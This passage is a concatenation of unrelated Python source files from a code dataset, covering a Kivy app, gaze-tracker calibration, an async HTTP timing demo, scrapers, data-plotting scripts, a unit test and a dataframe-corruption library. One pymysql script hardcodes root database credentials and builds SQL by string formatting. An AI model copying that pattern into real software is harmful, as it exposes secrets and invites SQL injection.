kivymd.toolbar import Toolbar\nfrom kivymd.dialog import MDDialog\nfrom kivymd.label import MDLabel\n\nTRANSACTION_COLUMNS = ['who_paid', 'amount', 'currency', 'for_whom',\n 'split_amounts', 'purpose', 'category', 'date_time',\n 'exchange_rate', 'converted_amount', 'type', 'receipt']\n\nTABLE_COLUMN_NAMES = ['Purpose', 'Category', 'Date & time']\n\n################################################################################\n# Internal transactions.csv logic\n################################################################################\n\n\nclass Transaction(namedtuple('Transaction', TRANSACTION_COLUMNS)):\n def to_better_transaction(self):\n for_whom = self.for_whom.split(';')\n split_amounts = map(float, self.split_amounts.split(';'))\n if self.exchange_rate.strip(): # self.currency != \"EUR\":\n exchange_rate = float(self.exchange_rate.split(':')[1])\n split_amounts = [amount/exchange_rate for amount in split_amounts]\n amounts = dict(zip(for_whom, split_amounts))\n return BetterTransaction(self.purpose, self.category, self.date_time,\n amounts)\n\n\nclass BetterTransaction:\n def __init__(self, purpose, category, date_time, amounts):\n self.purpose = purpose\n self.category = category\n self.date_time = date_time\n self.amounts = amounts\n\n def to_row(self, names):\n content = [self.purpose, self.category, self.date_time]\n content += [str(self.amounts.get(name, 0)) for name in names]\n return content\n\n\ndef extract_names(filename):\n found_names = set()\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n next(reader) # skip the first line\n for row in reader:\n trans = Transaction(*row)\n found_names |= set(trans.who_paid.split(';'))\n found_names |= set(trans.for_whom.split(';'))\n return list(found_names)\n\n\ndef extract_rows(filename, names):\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n next(reader)\n for row in reader:\n trans = Transaction(*row)\n yield trans.to_better_transaction().to_row(names)\n\n################################################################################\n# Table widget\n################################################################################\n\n\nclass Header(BoxLayout):\n text = StringProperty()\n\n\nclass Cell(BoxLayout):\n text = StringProperty()\n\n\nclass Table(BoxLayout):\n color = [128, 0, 2, 0.8]\n cols = NumericProperty(1)\n content = ListProperty([['col 1', 'col 2'],\n ['row 11', 'row 21'],\n ['row 12', 'row 22']],\n allownone=True)\n\n def on_content(self, instance=None, value=None):\n if not self.ids:\n Clock.schedule_once(self.on_content)\n else:\n self.cols = len(self.content[0])\n for header in self.content[0]:\n self.ids['header'].add_widget(Header(text=header.upper()))\n for row in self.content[1:]:\n for element in row:\n self.ids['body'].add_widget(Cell(text=element))\n\n################################################################################\n# Custom screens\n################################################################################\n\n\nclass WelcomeScreen(BoxLayout):\n pass\n\n\nclass OverviewScreen(FloatLayout):\n filename = StringProperty()\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n names = extract_names(self.filename)\n table_content = [TABLE_COLUMN_NAMES+names]\n table_content += list(extract_rows(self.filename, names))\n self.add_widget(Table(content=table_content))\n\n\nclass MainWindow(BoxLayout):\n def open_overview(self, filename):\n self.overview_screen = OverviewScreen(filename=filename)\n self.add_widget(self.overview_screen)\n\n\nclass SettleUpOverviewApp(App):\n theme_cls = ThemeManager()\n\n def build(self):\n Logger.info('Application: System: '+platform)\n return MainWindow()\n\n def file_chosen(self):\n file_chooser = self.root.ids.welcome_screen.ids.file_chooser\n filename = file_chooser.selection[0]\n Logger.debug('Application: Chosen file: '+filename)\n self.root.remove_widget(self.root.ids.welcome_screen)\n self.root.open_overview(filename)\n\n\nif __name__ == \"__main__\":\n app = SettleUpOverviewApp()\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"483109754","text":"import psychopy.visual\nimport psychopy.event\nimport psychopy.core\nimport sys\nimport random\n\nimport GazeParser.TrackingTools\n\nimport wx\n\nclass FileWindow(wx.Frame):\n def __init__(self,parent,id,title):\n wx.Frame.__init__(self,parent,id,title)\n \n panel = wx.Panel(self,wx.ID_ANY)\n \n vbox = wx.BoxSizer(wx.VERTICAL)\n \n addressBox = wx.BoxSizer(wx.HORIZONTAL)\n addressBox.Add(wx.StaticText(panel,wx.ID_ANY,'SimpleGazeTracker address',size=(160,30)),0)\n self.addressEdit = wx.TextCtrl(panel,wx.ID_ANY)\n self.addressEdit.SetValue('192.168.1.1')\n addressBox.Add(self.addressEdit,1)\n vbox.Add(addressBox, 0, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 10)\n \n imgsizeBox = wx.BoxSizer(wx.HORIZONTAL)\n imgsizeBox.Add(wx.StaticText(panel,wx.ID_ANY,'Capture image size',size=(160,30)),0)\n self.imgsizeEdit = wx.TextCtrl(panel,wx.ID_ANY)\n self.imgsizeEdit.SetValue('640,480')\n imgsizeBox.Add(self.imgsizeEdit,1)\n vbox.Add(imgsizeBox, 0, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 10)\n \n isdummyBox = wx.BoxSizer(wx.HORIZONTAL)\n self.isdummyCheck = wx.CheckBox(panel,wx.ID_ANY,'Use dummy mode (for standalone debug)')\n isdummyBox.Add(self.isdummyCheck)\n vbox.Add(isdummyBox, 0, wx.ALIGN_CENTER | wx.CENTER, 10)\n \n vbox.Add((-1, 25))\n \n okBox = wx.BoxSizer(wx.HORIZONTAL)\n okButton = wx.Button(panel,wx.ID_ANY, 'Ok', size=(70, 30))\n self.Bind(wx.EVT_BUTTON, self.quitfunc, okButton)\n okBox.Add(okButton)\n vbox.Add(okBox, 0, wx.ALIGN_CENTER | wx.CENTER, 10)\n \n panel.SetSizer(vbox)\n \n self.Show(True)\n \n def quitfunc(self, event):\n global FileWindowValues\n address = self.addressEdit.GetValue()\n imgsize = self.imgsizeEdit.GetValue()\n isdummy = self.isdummyCheck.GetValue()\n \n FileWindowValues = {'address':address,'imgsize':imgsize,'isdummy':isdummy}\n self.Close(True)\n\nFileWindowValues = {}\napplication = wx.App(False)\nfw = FileWindow(None,wx.ID_ANY,\"Sample05_PsychoPy\")\napplication.MainLoop()\n\n\nxy = FileWindowValues['imgsize'].split(',')\ncameraX = int(xy[0])\ncameraY = int(xy[1])\n\ntracker = GazeParser.TrackingTools.getController(backend='PsychoPy',dummy=FileWindowValues['isdummy'])\ntracker.setReceiveImageSize((cameraX,cameraY))\ntracker.connect(FileWindowValues['address'])\n\nwin = psychopy.visual.Window(size=(1024,768),units='pix')\n\ncalarea = (-400,-300,400,300)\ncalTargetPos = [[ 0, 0],\n [-350,-250],[-350, 0],[-350,250],\n [ 0,-250],[ 0, 0],[ 0,250],\n [ 350,-250],[ 350, 0],[ 350,250]]\n\ntracker.setCalibrationScreen(win)\ntracker.setCalibrationTargetPositions(calarea, calTargetPos)\n\nmsg = psychopy.visual.TextStim(win)\n\n#Slow\ntracker.setCalTargetMotionParams(durationPerPos=3.0, motionDuration=2.0)\ntracker.setCalSampleAcquisitionParams(numSamplesPerPos=10, getSampleDelay=0.4) #default\nmsg.setText('durationPerPos=3.0, motionDuration=2.5')\nmsg.draw()\nwin.flip()\npsychopy.event.waitKeys()\n\ntracker.calibrationLoop()\n\n","sub_path":"Samples/sample05_caltargetslow_PsychoPy.py","file_name":"sample05_caltargetslow_PsychoPy.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"11208803","text":"import aiohttp\nimport asyncio\nimport time\n\nasync def fetch_page(url):\n page_start = time.time()\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n print(response.status)\n print(f\"Page took {time.time() - page_start}\")\n return response.status\n\nloop = asyncio.get_event_loop()\n\n# We are getting coroutines objects, we not calling the function!!!\n# No requests are being made, only coroutines are being made\ntasks = [fetch_page('http://google.com') for i in range(50)]\n\nstart = time.time()\nloop.run_until_complete(asyncio.gather(*tasks))\nprint(f\"All took {time.time() - start}\")","sub_path":"Asynchronous Dev/async_request.py","file_name":"async_request.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"645985455","text":"# -*- coding: utf-8 -*-\nfrom .. import models\nimport qmongo\nfrom qmongo import transaction\nimport datetime\nfrom bson import ObjectId\nfrom .. import common\n\ndef get_list(args):\n\n searchText = args['data'].get('search', '')\n pageSize = args['data'].get('pageSize', 0)\n pageIndex = args['data'].get('pageIndex', 20)\n sort = args['data'].get('sort', 20)\n\n pageIndex = (lambda pIndex: pIndex if pIndex != None else 0)(pageIndex)\n pageSize = (lambda pSize: pSize if pSize != None else 20)(pageSize)\n search = (lambda x: x.strip() if searchText != None else \"\")(searchText)\n\n collection = qmongo.models.TMPER_TargetKPIDetail.aggregate\n collection.left_join(models.auth_user_info(), \"created_by\", \"username\", \"uc\")\n collection.left_join(models.auth_user_info(), \"modified_by\", \"username\", \"um\")\n collection.project(\n rec_id=1,\n ref_id=1,\n apr_period=1,\n apr_year=1,\n employee_code=1,\n target_name=1,\n perform_date=1,\n perform=1,\n note=1,\n created_by=\"uc.login_account\",\n created_on=\"created_on\",\n modified_on=\"switch(case(modified_on!='',modified_on),'')\",\n modified_by=\"switch(case(modified_by!='',um.login_account),'')\"\n )\n collection.match(\"ref_id == @ref_id\", ref_id = args['data']['rec_id'])\n\n if (searchText != None):\n collection.match(\"contains(target_name, @name) or contains(unit_name, @name)\" + \\\n \" or contains(weight, @name) or contains(target, @name)\" +\\\n \" or contains(min_value, @name) or contains(max_value, @name)\" + \\\n \" or contains(origin_target, @name)\", name=search.strip())\n\n if (sort != None):\n collection.sort(sort)\n\n return collection.get_page(pageIndex, pageSize)\n\n","sub_path":"apps/performance/api/services/TMPER_TargetKPIDetailService.py","file_name":"TMPER_TargetKPIDetailService.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"173730717","text":"\r\nfrom . import base_searcher\r\nfrom models import CurrencyRate\r\nimport json\r\nimport http.client\r\nimport requests\r\nimport re\r\nfrom datetime import datetime\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\n\r\n\r\ndef getCleanStr(value):\r\n return value.strip()\r\ndef getDateTime(value):\r\n s=[int(x) for x in value.replace(\"年\",\"-\").replace(\"月\",\"-\").replace(\"日\",\"\").split(\"-\")]\r\n return datetime(s[0],s[1],s[2])\r\nclass CMBPriceSearcher(base_searcher.BaseSearcher):\r\n curencyDic={\r\n \"美元\":\"USD\",\r\n \"日元\":\"JPY\",\r\n \"欧元\":\"EUR\",\r\n \"港币\":\"HKD\",\r\n \"新加坡元\":\"SGD\",\r\n \"澳大利亚元\":\"AUD\",\r\n \"英镑\":\"GBP\",\r\n \"加拿大元\":\"CAD\",\r\n \"瑞士法郎\":\"CHF\",\r\n \"新西兰元\":\"NZD\"\r\n }\r\n\r\n \r\n def getData(self):\r\n r=requests.get(\"http://fx.cmbchina.com/hq/\")\r\n r=re.search('[\\s]{1}[\\s\\S]*
[\\s]{1}',r.text)\r\n soup=BeautifulSoup(r.group(),'html5lib')\r\n data_list=[]\r\n for idx,tr in enumerate(soup.find_all(\"tr\")):\r\n if idx!=0:\r\n tds=tr.find_all(\"td\")\r\n data_list.append(CurrencyRate(\r\n \"CMB\",\r\n CMBPriceSearcher.curencyDic[getCleanStr(tds[0].contents[0])],\r\n getCleanStr(tds[4].contents[0]),\r\n getCleanStr(tds[6].contents[0])))\r\n return data_list\r\n \r\n def getHistoryData(self,currencyCHNName):\r\n historyUrl=\"http://fx.cmbchina.com/Hq/History.aspx?&nbr=%s&page=\" % currencyCHNName\r\n data_list=[]\r\n for pageID in range(1,20):\r\n r=requests.get(historyUrl+str(pageID))\r\n r=re.search('[\\s]+[\\s\\S]*[\\s]+',r.text)\r\n soup=BeautifulSoup(\"\"+r.group()+\"
\",'html5lib')\r\n \r\n for tr in soup.find_all(\"tr\"):\r\n tds=tr.find_all(\"td\")\r\n data=CurrencyRate(\r\n \"CMB\",\r\n CMBPriceSearcher.curencyDic[currencyCHNName],\r\n getCleanStr(tds[4].contents[0]),\r\n getCleanStr(tds[2].contents[0]),\r\n getDateTime(getCleanStr(tds[0].contents[0])))\r\n print(str(data))\r\n data_list.append(data) \r\n return data_list\r\n\r\n def getAllHistoryData(self):\r\n data_list=[]\r\n for key in CMBPriceSearcher.curencyDic.keys():\r\n data_list.extend(self.getHistoryData(key))\r\n \r\n return data_list\r\n \r\n\r\n\r\n","sub_path":"getcurrencyrate/searcher/cmb_searcher.py","file_name":"cmb_searcher.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"318564433","text":"'''/////////////////////////////////////////////////////////////////\nHEADER:\n#DEPENDENCIES\n\tPopulation_poa\n\tsys\n\tmatplotlib.pyplot\n\n#FUNCTION AND DESCRIPTION\n\tthis is a simple function that fethes the population and age of \n\tpostcodes and then plots it as a function of postcode address. \n\tthis does not take distance or population density into account\n////////////////////////////////////////////////////////////////////\n#AUTHOR: RYAN MAY\n#STUDENT ID: 19477774\n#PUBLISHED: 26/05/2018\n#CURTIN UNIVERISTY COMP1001 COURSE\n////////////////////////////////////////////////////////////////////\nFILES: \n\t../Shared_Python_moldules/Population_poa.py \n\t../Processing_Data/2016_Census_POA.csv\t\t\t\t\t\n\t../Processing_Data/postcodes.csv\t\t\t\t\t\t\nOUTPUT FILES:\t\n\tGraphs/POPULATION_R_POA.png \t\t\t\t\t\t\t\n/////////////////////////////////////////////////////////////////'''\n\nimport sys\nsys.path.insert(0, '../Shared_Python_modules/')\nfrom Population_poa import POPOFPOA \nimport matplotlib.pyplot as plt\n\nCENSUS_DATA_DIR = \"../Processing_Data/2016_Census_POA.csv\"\n\nx = POPOFPOA(CENSUS_DATA_DIR)\nPOPULATION = x.processing()\n\nPOSTCODE_FILE = open('../Processing_Data/postcodes.csv','r')\nPOSTCODE = (POSTCODE_FILE.read()).split('\\n')[:-1:]\n\nplt.style.use('ggplot')\nplt.plot(POSTCODE, POPULATION)\nplt.title(\"POPULATION PER POSTCODE\")\nplt.xlabel(\"POSTODE OF RESIDENCY\")\nplt.ylabel(\"POPULATION OF POSTCODE\")\nplt.savefig(\"Graphs/POPULATION_R_POA.png\")\nplt.show()\n\n","sub_path":"Hypothesis1/GRAPH_Populaion_R_Postcode.py","file_name":"GRAPH_Populaion_R_Postcode.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"374240910","text":"import pandas as pd\nfrom pandas.api.types import is_numeric_dtype, is_datetime64_any_dtype, is_categorical_dtype\nfrom numpy.random import default_rng\nfrom time import time\nfrom functools import reduce\nfrom warnings import warn\nfrom .stainer import Stainer\nfrom .history import *\n\nclass DirtyDF:\n \"\"\"\n Dirty DataFrame. Stores information about the dataframe to be stained, previous staining results, \n and the mapping of the rows and columns.\n \n To be used in conjunction with Stainer class to add and execute stainers.\n \"\"\"\n def __init__(self, df, seed = None, copy = False):\n \"\"\" \n Constructor for DirtyDF\n \n Parameters\n ----------\n df : pd.DataFrame \n Dataframe to be transformed.\n seed : int, optional\n Controls the randomness of the staining process. For a\n deterministic behaviour, seed has to be fixed to an integer. If unspecified, will choose a random seed\n copy : boolean, optional\n Not for use by user. Determines if a copy of DirtyDF is being\n created. If True, will copy the details from the previous DDF.\n \"\"\"\n self.df = df\n \n if not copy:\n if not seed:\n self.seed = int(time() * 100 % (2**32 - 1))\n else:\n self.seed = seed\n \n self.rng = default_rng(self.seed)\n self.orig_shape = df.shape\n self.stainers = []\n self.row_map = {i: [i] for i in range(df.shape[0])} \n self.col_map = {i: [i] for i in range(df.shape[1])} \n self.history = [] \n \n self.cat_cols = [i for i in range(df.shape[1]) if is_categorical_dtype(df.iloc[:, i])]\n self.num_cols = [i for i in range(df.shape[1]) if is_numeric_dtype(df.iloc[:, i])]\n self.dt_cols = [i for i in range(df.shape[1]) if is_datetime64_any_dtype(df.iloc[:, i])]\n \n def get_df(self):\n \"\"\" Returns the dataframe \n \n Returns\n ----------\n df : pd.DataFrame\n Current dataframe in DDF\n \"\"\"\n return self.df\n \n def get_seed(self):\n \"\"\" Returns seed number \n \n Returns\n ----------\n seed : int\n Integer seed used to create Generator for randomisation \n \"\"\"\n return self.seed\n \n def get_rng(self):\n \"\"\" Returns seed generator\n \n Returns\n ----------\n rng : np.random.BitGenerator\n PCG64 pseudo-random number generator used for randomisation\n \"\"\"\n return self.rng\n\n def get_mapping(self, axis = 0):\n \"\"\" Mapping of rows/cols from original dataframe to most recent dataframe. \n A dictionary is returned with information on which index the original\n rows/cols are displayed in the newest dataframe. \n For instance, if row 3 got shuffled to row 8 in the new dataframe, then\n row 8 got shuffled to row 2, the function will return {3: [2]}\n \n Parameters\n ----------\n axis : (0/1), optional\n If 0, returns the row mapping.\n If 1, returns the col mapping.\n \n Defaults to 0\n \n Returns\n ----------\n map : {int : int list} dictionary \n Mapping of original row/col indices to current dataframe's row/col indices.\n \n Raises\n ----------\n Exception\n If axis provided is not 0/1\n \"\"\"\n if axis in (0, \"row\"):\n return self.row_map\n if axis in (1, \"column\"):\n return self.col_map\n raise Exception(\"Invalid axis parameter\")\n\n def get_map_from_history(self, index, axis = 0):\n \"\"\" Mapping of rows/cols of the sepcified stainer transformation that had been executed.\n A dictionary is returned with information on what row/col index right\n before the specified transformation has converted to after the\n transformation. \n For instance, if row 3 got shuffled to row 8 in the new dataframe, then\n row 8 got shuffled to row 2, calling index=0 will return {3: [8]} \n and calling index=1 will return {8: [2]}\n \n Parameters\n ----------\n index : int\n Index of stainer sequence to query mapping. E.g. index=1 will query\n the mapping performed by the 2nd stainer operation.\n axis : (0/1), optional\n If 0, returns the row mapping.\n If 1, returns the col mapping.\n \n Defaults to 0\n \n Returns\n ----------\n map : {int : int list} dictionary \n Mapping of original row/col indices to current dataframe's row/col indices.\n \n Raises\n ----------\n Exception\n If axis provided is not 0/1\n \"\"\"\n if axis in (0, \"row\"):\n return self.history[index].get_row_map()\n if axis in (1, \"col\"):\n return self.history[index].get_col_map()\n raise Exception(\"Invalid axis parameter\")\n \n def get_previous_map(self, axis = 0):\n \"\"\" Mapping of rows/cols of the most recent stainer transformation that had been executed.\n A dictionary is returned with information on what row/col index right\n before the transformation has converted to after the transformation. \n For instance, if row 3 got shuffled to row 8 in the new dataframe, then\n row 8 got shuffled to row 2, the function will return {8: [2]}\n \n Parameters\n ----------\n axis : (0/1), optional\n If 0, returns the row mapping.\n If 1, returns the col mapping.\n \n Defaults to 0\n \n Returns\n ----------\n map : {int : int list} dictionary \n Mapping of original row/col indices to current dataframe's row/col indices.\n \n Raises\n ----------\n Exception\n If axis provided is not 0/1\n \"\"\"\n return self.get_map_from_history(-1, axis)\n\n def reset_rng(self):\n \"\"\" Resets Random Generator object \"\"\"\n self.rng = default_rng(self.seed)\n \n # Print methods\n def summarise_stainers(self):\n \"\"\" Prints names of stainers that have yet to be executed \"\"\"\n for i, stainer in enumerate(self.stainers):\n print(f\"{i+1}. {stainer[0].name}\")\n\n def print_history(self):\n \"\"\" Print historical details of the stainers that have been executed \"\"\"\n tuple(map(lambda x: print(self.history.index(x) + 1, x, sep = \". \"), self.history))\n \n def __add_history__(self, data, row_map, col_map):\n \"\"\" Not to be explicitly called by user. Used in conjunction while running stainer to create and add History object to DDF information.\n \n Parameters\n ----------\n data : (str, str, float) tuple\n (name of stainer, message, time taken). Contains data to be used to create the History object\n row_map: {int: int} dictionary \n Row mapping showing the relationship between the original and new\n row positions. Only applies to transformation for the specific\n stainer.\n col_map: {int: int} dictionary\n Column mapping showing the relationship between the original and\n new column positions. Only applies to transformation for the\n specific stainer.\n \"\"\"\n self.history.append(History(data, row_map, col_map))\n \n def add_stainers(self, stain, use_orig_row = True, use_orig_col = True):\n \"\"\" Adds a stainer / list of stainers to current list of stainers to be executed.\n \n Parameters\n ----------\n stain : Stainer or Stainer list \n stainers to be added to the DDF to be executed in the future\n use_orig_row : boolean, optional\n Indicates if indices in stainer refers to the initial dataframe, or\n the index of the dataframe at time of execution.\n If True, indices from initial dataframe are used. Defaults to True\n use_orig_col : boolean, optional\n Indicates if indices in stainer refers to the initial dataframe, or\n the index of the dataframe at time of execution.\n If True, indices from initial dataframe are used. Defaults to True\n \n Returns\n ----------\n ddf : DirtyDF\n Returns new copy of DDF with the stainer added\n \"\"\"\n ddf = self.copy()\n if isinstance(stain, Stainer):\n ddf.stainers.append((stain, use_orig_row, use_orig_col))\n else:\n for st in stain:\n ddf.stainers.append((st, use_orig_row, use_orig_col))\n \n return ddf\n \n def reindex_stainers(self, new_order):\n \"\"\"\n Reorder stainers in a specified order \n \n Parameters\n ----------\n new_order : int list\n Indices of the new order of stainers. If original was [A, B, C] and\n new_order = [1, 2, 0], the resulting order will be [C, A, B].\n \n Returns\n ----------\n ddf : DirtyDF\n Returns new copy of DDF with the stainers rearranged\n \"\"\"\n ddf = self.copy()\n ddf.stainers = list(map(lambda x: ddf.stainers[x], new_order))\n \n return ddf\n \n def shuffle_stainers(self):\n \"\"\"\n Randomly reorder the stainers\n \n Returns\n ----------\n ddf : DirtyDF\n Returns new copy of DDF with the stainers rearranged\n \"\"\"\n n = len(self.stainers)\n new_order = self.rng.choice([i for i in range(n)], size = n, replace = False)\n return self.reindex_stainers(new_order)\n \n def run_stainer(self, idx = 0):\n \"\"\"\n Applies the transformation of the specified stainer\n \n Parameters\n ----------\n idx : int, optional\n Index of stainer to execute. Defaults to 0 (first stainer added)\n \n Returns\n ----------\n ddf : DirtyDF\n Returns new DDF after the specified stainer has been executed\n \"\"\"\n ddf = self.copy()\n stainer, use_orig_row, use_orig_col = ddf.stainers.pop(idx)\n \n row, col = stainer.get_indices()\n \n n_row, n_col = self.orig_shape\n \n default_given = False\n if not row:\n row = [i for i in range(n_row)]\n if not col:\n col = [i for i in range(n_col)]\n default_given = True\n \n if use_orig_row:\n final_row = []\n for ele in row:\n final_row.extend(self.row_map[ele])\n row = final_row\n\n if use_orig_col:\n final_col = []\n for ele in col:\n final_col.extend(self.col_map[ele])\n col = final_col\n \n col_type = stainer.get_col_type()\n if col_type == \"all\":\n col = col\n elif col_type not in (\"category\", \"cat\", \n \"datetime\", \"date\", \"time\", \n \"numeric\", \"int\", \"float\"):\n warn(f\"Invalid Stainer Column type for {stainer.name}. Using all columns instead\")\n else:\n input_cols = set(col)\n if col_type in (\"category\", \"cat\"):\n relevant_cols = set(ddf.cat_cols)\n if col_type in (\"datetime\", \"date\", \"time\"):\n relevant_cols = set(ddf.dt_cols)\n if col_type in (\"numeric\", \"int\", \"float\"):\n relevant_cols = set(ddf.num_cols)\n if not default_given and not input_cols.issubset(relevant_cols):\n raise TypeError(f\"Column with incorrect column type provided to stainer {stainer.name}, which requires column type {col_type}.\")\n else:\n col = list(input_cols & relevant_cols)\n \n res = stainer.transform(self.df, self.rng, row, col)\n \n try:\n new_df, row_map, col_map = res\n except:\n raise Exception(\"Need to enter a row_map and col_map. If no rows or columns were added/deleted, enter an empty list\")\n\n # Default options\n if not len(row_map):\n row_map = {i: [i] for i in range(new_df.shape[0])} \n if not len(col_map):\n col_map = {i: [i] for i in range(new_df.shape[1])} \n \n def new_mapping(original, new):\n \"\"\"\n Given an old mapping and a one-step mapping, returns a mapping that connects the most\n original one to the final mapping \n \"\"\"\n final_map = {}\n for k, v in original.items():\n final_map[k] = []\n for element in v:\n final_map[k].extend(new[element])\n \"\"\"\n final_map = np.zeros((len(original), len(new[0])))\n for i in range(len(original)):\n initial_map = np.nonzero(original[i])[0]\n new_idx = reduce(lambda x, y: np.concatenate([x,y]).reshape(-1),\n map(lambda x: np.nonzero(new[x])[0], initial_map))\n if len(new_idx):\n final_map[i][new_idx] = 1\n return final_map\n \"\"\"\n return final_map\n\n\n ddf.row_map = new_mapping(self.row_map, row_map)\n ddf.col_map = new_mapping(self.col_map, col_map)\n \n ddf.__add_history__(stainer.get_history(), row_map, col_map) # This stores the -1 mapping\n ddf.df = new_df\n return ddf\n \n def run_all_stainers(self): \n \"\"\"\n Applies the transformation of all stainers in order\n \n Returns\n ----------\n ddf : DirtyDF\n Returns new DDF after all the stainers have been executed\n \"\"\"\n current_ddf = self\n for stainer in self.stainers:\n current_ddf = current_ddf.run_stainer()\n return current_ddf\n\n def copy(self):\n \"\"\"\n Creates a copy of the DDF\n \n Returns\n ----------\n ddf : DirtyDF\n Returns copy of DDF\n \"\"\"\n new_ddf = DirtyDF(self.df.copy(), copy = True)\n new_ddf.seed = self.seed\n new_ddf.rng = self.rng\n new_ddf.orig_shape = self.orig_shape\n new_ddf.stainers = self.stainers.copy()\n new_ddf.history = self.history.copy()\n new_ddf.row_map = self.row_map.copy()\n new_ddf.col_map = self.col_map.copy()\n return new_ddf\n","sub_path":"ddf/ddf/DirtyDF.py","file_name":"DirtyDF.py","file_ext":"py","file_size_in_byte":14626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"315334665","text":"import csv\n\n\nwith open('od.csv', \"r\") as f:\n reader = list(csv.reader(f))\n od = []\n for i in range(len(reader)-1):\n for j in range(len(reader[i+1])-1):\n odi2j = [int(reader[0][j+1]), int(reader[i+1][0]), int(reader[i+1][j+1])]\n od.append(odi2j)\n\ncsvFile=open(\"test.csv\",'w',newline='')\ntry:\n writer=csv.writer(csvFile)\n for i in range(len(od)):\n writer.writerow(od[i])\nfinally:\n csvFile.close()\n\n","sub_path":"地铁2/od_csv.py","file_name":"od_csv.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"521877318","text":"import unittest\nfrom unittest.mock import patch\n\nfrom tmc import points\nfrom tmc.utils import load, load_module, reload_module, get_stdout, check_source\nimport os\nimport textwrap\n\nexercise = 'src.poista_isot'\nfunction = 'poista_isot'\n\ndef get_correct(test_case: list) -> list:\n return [x for x in test_case if not x.isupper()]\n\n@points('4.poista_isot')\nclass PoistaIsotTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n with patch('builtins.input', side_effect=[AssertionError(\"Syötteen pyytämistä ei odotettu\")]):\n cls.module = load_module(exercise, 'fi')\n\n def test_0_paaohjelma_kunnossa(self):\n ok, line = check_source(self.module)\n message = \"\"\"Funktioita testaava koodi tulee sijoittaa lohkon\nif __name__ == \"__main__\":\nsisälle. Seuraava rivi tulee siirtää:\n\"\"\"\n self.assertTrue(ok, message+line)\n\n def test_1_funktio_olemassa(self):\n try:\n from src.poista_isot import poista_isot\n except:\n self.assertTrue(False, 'Koodistasi pitäisi löytyä funktio nimeltä poista_isot(lista: list)')\n try:\n from src.poista_isot import poista_isot\n poista_isot([\"Abc\"])\n except:\n self.assertTrue(False, 'Varmista että seuraava funktiokutsu onnistuupoista_isot([\"Abc\"])')\n\n def test_2_ei_paluuarvo(self):\n poista_isot = load(exercise, function, 'fi')\n val = poista_isot([\"Abc\"])\n self.assertTrue(type(val) == list, f'Funktio {function} ei palauta listaa kun sitä kutsutaan \\npoista_isot([\"Abc\"])')\n \n def test_3_poistettavat_ei_perakkain(self):\n for test_case in [[\"EKA\", \"toka\", \"KOLMAS\", \"neljäs\"], [\"aaaa\", \"BBBB\", \"cccc\", \"dddd\", \"EEEE\", \"ffff\", \"GGGG\"]]:\n with patch('builtins.input', side_effect=[AssertionError(\"Syötteen pyytämistä ei odotettu\")]):\n reload_module(self.module)\n output_alussa = get_stdout()\n poista_isot = load(exercise, function, 'fi')\n \n correct = get_correct(test_case)\n test_case_original = test_case[:]\n vastaus = poista_isot(test_case)\n\n self.assertTrue(correct == vastaus, f\"Paluuarvo\\n{vastaus}\\nei vastaa odotettua\\n{correct}\\nkutsuttaessa poista_isot({test_case_original})\")\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"osa04-24_poista_isot/test/test_poista_isot.py","file_name":"test_poista_isot.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"320141921","text":"import pymysql\nimport pandas as pd\n\ndb = pymysql.connect(\"192.168.103.31\", \"root\", \"adminadmin\", \"downloads\")\n\npath = r'C:\\Users\\Administrator.DESKTOP-DV7S27B\\Desktop\\需要维护的数据\\下载量\\下载量二级类和对应的种类.xlsx'\ndata_excel = pd.read_excel(path)\nprint(data_excel)\nlv2 = data_excel['二级类']\ncategory = data_excel['种类']\ncategory_dict = dict(zip(lv2, category))\nprint(category_dict)\ncursor = db.cursor()\nfor lv2, category in category_dict.items():\n # print(result)\n sql = \"\"\"UPDATE ANDROID_SAFE_APP SET category = '%s' WHERE category_lv2 = '%s'\"\"\" % (category, lv2)\n print(sql)\n # cursor.execute(sql)\n # 提交到数据库执行\n db.commit()\nprint(category_dict)\n{'便捷生活': '便捷生活', '购物': '购物', '购物优惠': '购物', '视频': '视频', '影音视听': '视频', '理财': '理财', '金融理财': '理财', '社交': '社交', '通讯': '社交',\n '通讯社交': '社交', '运动健康': '运动健康', '旅游酒店': '旅游酒店', '教育学习': '教育学习', '音乐': '音乐', '实用工具': '工具', '微应用': '工具', '常用工具': '工具',\n '软件': '工具', '系统': '系统', '系统安全': '系统', '手机美化': '系统', '主题壁纸': '系统', '摄影': '摄影', '摄影摄像': '摄影', '出行': '出行', '交通导航': '出行',\n '阅读': '阅读', '新闻阅读': '阅读', '育儿母婴': '育儿母婴', '办公商务': '办公商务', '生活服务': '生活服务'}\n","sub_path":"IDGdemo/Downloads/mysql/360sql语句/2.根据Lv2确定category.py","file_name":"2.根据Lv2确定category.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"152588161","text":"#!/usr/bin/python3\n#\t\t\t\tSynopsis:\n#A collection of all the 